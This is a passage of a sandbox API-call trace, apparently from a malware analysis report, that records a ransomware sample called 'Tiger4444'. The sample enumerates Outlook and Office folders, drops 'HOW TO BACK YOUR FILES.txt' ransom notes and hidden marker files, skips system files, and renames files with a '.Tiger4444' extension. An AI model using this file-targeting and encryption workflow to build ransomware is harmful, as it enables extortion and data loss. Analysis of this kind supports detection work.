dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.440] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.440] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.440] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8445e514, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8445e514, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.440] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0052.441] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.441] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\powerpoint\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.441] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.441] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.441] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.441] CloseHandle (hObject=0x2c8) returned 1 [0052.442] CloseHandle (hObject=0x2ac) returned 1 [0052.442] GetCurrentThreadId () returned 0xfa8 [0052.442] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91470 [0052.442] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook" [0052.442] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f6a8 | out: hHeap=0xc50000) returned 1 [0052.442] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91468 | out: hHeap=0xc50000) returned 1 [0052.442] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook" [0052.442] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\" [0052.442] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3" [0052.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.443] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.445] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.446] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.446] CloseHandle (hObject=0x2ac) returned 1 [0052.447] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook") returned 49 [0052.447] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.447] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.447] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.447] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.447] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.447] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.447] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.447] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.447] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.447] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.447] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.447] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.447] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8445e514, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8445e514, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x844847a7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.447] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.447] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.447] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac358392, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xac358392, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xac4aebd0, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0052.447] lstrcmpiW (lpString1="Outlook.srs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.447] lstrcmpiW (lpString1="Outlook.srs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="Tiger4444.exe") returned -1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2=".") returned 1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="..") returned 1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="windows") returned -1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="bootmgr") returned 1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="pagefile.sys") returned -1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="boot") returned 1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="ids.txt") returned 1 [0052.448] lstrcmpiW (lpString1="Outlook.srs", lpString2="NTUSER.DAT") returned 1 [0052.448] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="Outlook.srs" | out: lpString1="Outlook.srs") returned="Outlook.srs" [0052.448] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs", dwFileAttributes=0x0) returned 1 [0052.448] lstrlenW (lpString="Outlook.srs") returned 11 [0052.448] lstrlenW (lpString="Tiger4444") returned 9 [0052.449] lstrcmpiW (lpString1="tlook.srs", lpString2="Tiger4444") returned 1 [0052.449] lstrlenW (lpString=".dll") returned 4 [0052.449] lstrcmpiW (lpString1=".srs", lpString2=".dll") returned 1 [0052.449] lstrlenW (lpString=".lnk") returned 4 [0052.449] lstrcmpiW (lpString1=".srs", lpString2=".lnk") returned 1 [0052.449] lstrlenW (lpString=".ini") returned 4 [0052.449] lstrcmpiW (lpString1=".srs", lpString2=".ini") returned 1 [0052.449] lstrlenW (lpString=".sys") returned 4 [0052.449] lstrcmpiW (lpString1=".srs", lpString2=".sys") returned -1 [0052.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.449] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.449] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14390212438) returned 1 [0052.449] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2560) returned 1 [0052.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0052.449] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0052.449] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x2a4 [0052.450] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0xbe0000 [0052.458] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.458] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0052.458] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.458] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0052.458] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.458] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0052.458] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.458] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0052.459] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14391164134) returned 1 [0052.459] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0052.459] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0052.459] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.459] CloseHandle (hObject=0x2a4) returned 1 [0052.459] CloseHandle (hObject=0x2c8) returned 1 [0052.459] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Tiger4444") returned 71 [0052.459] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.tiger4444"), dwFlags=0x1) returned 1 [0052.460] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd629eb7, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd650107, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x916, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="Tiger4444.exe") returned -1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2=".") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="..") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="windows") returned -1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="bootmgr") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="pagefile.sys") returned -1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="boot") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="ids.txt") returned 1 [0052.460] lstrcmpiW (lpString1="Outlook.xml", lpString2="NTUSER.DAT") returned 1 [0052.460] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="Outlook.xml" | out: lpString1="Outlook.xml") returned="Outlook.xml" [0052.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", dwFileAttributes=0x0) returned 1 [0052.460] lstrlenW (lpString="Outlook.xml") returned 11 [0052.460] lstrlenW (lpString="Tiger4444") returned 9 [0052.460] lstrcmpiW (lpString1="tlook.xml", lpString2="Tiger4444") returned 1 [0052.460] lstrlenW (lpString=".dll") returned 4 [0052.461] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0052.461] lstrlenW (lpString=".lnk") returned 4 [0052.461] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0052.461] lstrlenW (lpString=".ini") returned 4 [0052.461] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0052.461] lstrlenW (lpString=".sys") returned 4 [0052.461] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0052.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.461] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.461] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14391407703) returned 1 [0052.461] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2326) returned 1 [0052.461] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0052.461] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0052.461] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc20, lpName=0x0) returned 0x2a4 [0052.462] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc20) returned 0xbe0000 [0052.463] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.463] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0052.463] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.463] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0052.463] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.463] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0052.463] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.463] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0052.463] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14391644172) returned 1 [0052.463] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0052.463] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0052.463] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.464] CloseHandle (hObject=0x2a4) returned 1 [0052.464] CloseHandle (hObject=0x2c8) returned 1 [0052.464] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.Tiger4444") returned 71 [0052.464] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.tiger4444"), dwFlags=0x1) returned 1 [0052.465] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd629eb7, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd650107, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x916, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0052.465] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.465] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.466] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.466] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.466] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.466] CloseHandle (hObject=0x2c8) returned 1 [0052.466] CloseHandle (hObject=0x2ac) returned 1 [0052.466] GetCurrentThreadId () returned 0xfa8 [0052.466] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91530 [0052.466] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office" [0052.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0052.466] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91528 | out: hHeap=0xc50000) returned 1 [0052.466] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office" [0052.466] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\" [0052.466] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3" [0052.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.468] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.505] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.510] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.510] CloseHandle (hObject=0x2ac) returned 1 [0052.510] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office") returned 48 [0052.510] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.510] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x844aaa29, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0052.511] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.511] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.511] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.511] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.511] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x844aaa29, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.511] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.511] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.511] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.511] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.511] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.511] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x844aaa29, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x844aaa29, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x844f70ce, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.511] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.511] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.511] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2f2525a, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2f2525a, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x9362, 